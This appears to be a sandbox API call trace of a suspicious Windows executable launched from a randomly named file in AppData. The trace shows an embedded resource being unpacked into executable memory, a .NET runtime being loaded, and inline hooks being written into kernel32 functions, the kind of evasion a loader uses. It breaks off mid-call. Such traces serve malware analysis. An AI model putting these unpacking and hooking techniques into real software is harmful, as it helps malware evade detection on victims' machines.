??2@YAPEAX_K@Z () returned 0x25a2b0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a2f0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a330 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a370 [0194.474] ??3@YAXPEAX@Z () returned 0x56f7e301 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a3c0 [0194.474] ??2@YAPEAX_K@Z () returned 0x25a400 [0194.474] DllGetClassObject (in: rclsid=0x35cf60*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7feffbe6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1acee0 | out: ppv=0x1acee0*=0x2566d0) returned 0x0 [0194.474] ??2@YAPEAX_K@Z () returned 0x2566d0 [0194.475] IClassFactory:CreateInstance (in: This=0x2566d0, pUnkOuter=0x0, riid=0x1adcc0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1acf00 | out: ppvObject=0x1acf00*=0x25a500) returned 0x0 [0194.475] ??2@YAPEAX_K@Z () returned 0x25a440 [0194.475] GetSystemInfo (in: lpSystemInfo=0x1acd40 | out: lpSystemInfo=0x1acd40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0194.475] VirtualQuery (in: lpAddress=0x1acdb0, lpBuffer=0x1acd70, dwLength=0x30 | out: lpBuffer=0x1acd70*(BaseAddress=0x1ac000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff880)) returned 0x30 [0194.475] ??2@YAPEAX_K@Z () returned 0x255ac0 [0194.475] ??2@YAPEAX_K@Z () returned 0x25a480 [0194.475] ??2@YAPEAX_K@Z () returned 0x25a140 [0194.475] ??2@YAPEAX_K@Z () returned 0x25a4e0 [0194.476] ??2@YAPEAX_K@Z () returned 0x25a590 [0194.476] IUnknown:AddRef (This=0x25a500) returned 0x2 [0194.476] IUnknown:Release (This=0x25a500) returned 0x1 [0194.476] IUnknown:Release (This=0x2566d0) returned 0x0 [0194.476] ??3@YAXPEAX@Z () returned 0x56f7e301 [0194.476] IUnknown:QueryInterface (in: This=0x25a500, riid=0x7fefafaf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1ae148 | out: ppvObject=0x1ae148*=0x25a500) returned 0x0 [0194.476] IUnknown:Release (This=0x25a500) returned 0x1 [0194.476] _strnicmp (_Str1="?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0207.995] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0207.995] GetLastError () returned 0x0 [0207.995] SetLastError (dwErrCode=0x0) [0207.995] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0207.995] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0207.995] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ") returned 256 [0207.995] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0207.995] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0207.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿû©Ë/\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0207.995] GetLastError () returned 0x0 [0207.995] SetLastError (dwErrCode=0x0) [0207.995] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0207.995] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ") returned 256 [0207.995] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0207.995] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎛⠇ԺJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0207.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿû©Ë/\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0207.995] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49c704) returned 0x0 [0207.996] RtlSizeHeap (HeapHandle=0x1ed0000, Flags=0x0, MemoryPointer=0x1ed2a60) returned 0x80 [0208.034] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0208.036] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0xa) returned 0x541058 [0208.036] SizeofResource (hModule=0x400000, hResInfo=0x541058) returned 0x93400 [0208.036] VirtualAlloc (lpAddress=0x0, dwSize=0x93400, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0208.045] LoadResource (hModule=0x400000, hResInfo=0x541058) returned 0x4a90e8 [0208.158] VirtualAlloc (lpAddress=0x0, dwSize=0x9a000, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000 [0208.166] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0208.166] LoadLibraryA (lpLibFileName="mscoree.dll") returned 0x755f0000 [0208.625] GetProcAddress (hModule=0x755f0000, lpProcName="_CorExeMain") returned 0x755f4ddb [0208.625] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0208.625] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18fee8 | out: lpflOldProtect=0x18fee8*=0x40) returned 1 [0208.625] VirtualAlloc (lpAddress=0x0, dwSize=0x9a000, flAllocationType=0x3000, flProtect=0x40) returned 0x1ee0000 [0208.686] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x755f0000 [0208.686] GetProcAddress (hModule=0x755f0000, lpProcName="_CorExeMain") returned 0x755f4ddb [0208.686] VirtualProtect (in: lpAddress=0x1ee2000, dwSize=0x928d4, flNewProtect=0x4, lpflOldProtect=0x18f974 | out: lpflOldProtect=0x18f974*=0x40) returned 1 [0208.687] VirtualProtect (in: lpAddress=0x1ee2000, dwSize=0x928d4, flNewProtect=0x40, lpflOldProtect=0x18f974 | out: lpflOldProtect=0x18f974*=0x4) returned 1 [0208.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f99c | out: phkResult=0x18f99c*=0x64) returned 0x0 [0208.698] RegQueryValueExW (in: hKey=0x64, lpValueName="InstallRoot", lpReserved=0x0, lpType=0x18f990, lpData=0x18f788, lpcbData=0x18f994*=0x104 | out: lpType=0x18f990*=0x1, lpData="C:\\Windows\\Microsoft.NET\\Framework\\", lpcbData=0x18f994*=0x48) returned 0x0 [0208.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4a8000, cbMultiByte=-1, lpWideCharStr=0x18f580, cchWideChar=260 | out: lpWideCharStr="v4.0.30319") returned 11 [0208.699] RegCloseKey (hKey=0x64) returned 0x0 [0208.699] PathFileExistsW (pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\") returned 1 [0208.824] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorwks.dll") returned 0x0 [0209.002] LoadLibraryW (lpLibFileName="mscorwks.dll") returned 0x0 [0209.082] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sxs.dll") returned 0x0 [0209.086] LoadLibraryW (lpLibFileName="sxs.dll") returned 0x754c0000 [0209.660] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\shfolder.dll") returned 0x0 [0209.669] LoadLibraryW (lpLibFileName="shfolder.dll") returned 0x75650000 [0209.888] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\user32.dll") returned 0x0 [0210.055] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76890000 [0210.055] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\iphlpapi.dll") returned 0x0 [0210.056] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x755d0000 [0211.336] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\advapi32.dll") returned 0x0 [0211.337] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x767f0000 [0211.337] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Gdiplus.dll") returned 0x0 [0211.338] LoadLibraryW (lpLibFileName="Gdiplus.dll") returned 0x75330000 [0212.677] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll") returned 0x0 [0212.791] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76f80000 [0212.795] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll") returned 0x75250000 [0213.894] LoadLibraryW (lpLibFileName="diasymreader.dll") returned 0x75250000 [0213.895] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll") returned 0x0 [0213.895] LoadLibraryW (lpLibFileName="mscoree.dll") returned 0x755f0000 [0213.895] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsec.dll") returned 0x0 [0213.895] LoadLibraryW (lpLibFileName="mscorsec.dll") returned 0x0 [0213.898] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscordacwks.dll") returned 0x75010000 [0214.109] LoadLibraryW (lpLibFileName="mscordacwks.dll") returned 0x75010000 [0214.109] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Culture.dll") returned 0x75000000 [0214.302] LoadLibraryW (lpLibFileName="Culture.dll") returned 0x75000000 [0214.302] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorjit.dll") returned 0x0 [0214.310] LoadLibraryW (lpLibFileName="mscorjit.dll") returned 0x0 [0214.337] LoadLibraryW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll") returned 0x74fa0000 [0214.359] LoadLibraryW (lpLibFileName="mscorrc.dll") returned 0x74fa0000 [0214.359] PathFileExistsW (pszPath="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe") returned 1 [0214.423] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\jsc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0214.423] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb490 [0214.423] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a6ad0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0214.423] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6cd8, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0214.424] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0214.424] GetProcAddress (hModule=0x76990000, lpProcName="GetModuleHandleA") returned 0x769a1245 [0214.424] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2d10 [0214.424] VirtualProtect (in: lpAddress=0x1ed2d10, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x4) returned 1 [0214.425] VirtualProtect (in: lpAddress=0x769a1245, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x20) returned 1 [0214.425] VirtualProtect (in: lpAddress=0x769a1245, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0214.864] GetCurrentProcess () returned 0xffffffff [0214.864] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a1245, dwSize=0x5) returned 1 [0214.871] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0214.877] GetProcAddress (hModule=0x76990000, lpProcName="GetModuleHandleW") returned 0x769a34b0 [0214.881] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2d28 [0214.885] VirtualProtect (in: lpAddress=0x1ed2d28, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0214.902] VirtualProtect (in: lpAddress=0x769a34b0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x20) returned 1 [0214.914] VirtualProtect (in: lpAddress=0x769a34b0, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0214.938] GetCurrentProcess () returned 0xffffffff [0214.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a34b0, dwSize=0x5) returned 1 [0214.938] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0214.938] GetProcAddress (hModule=0x76990000, lpProcName="GetModuleFileNameW") returned 0x769a4950 [0214.938] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) 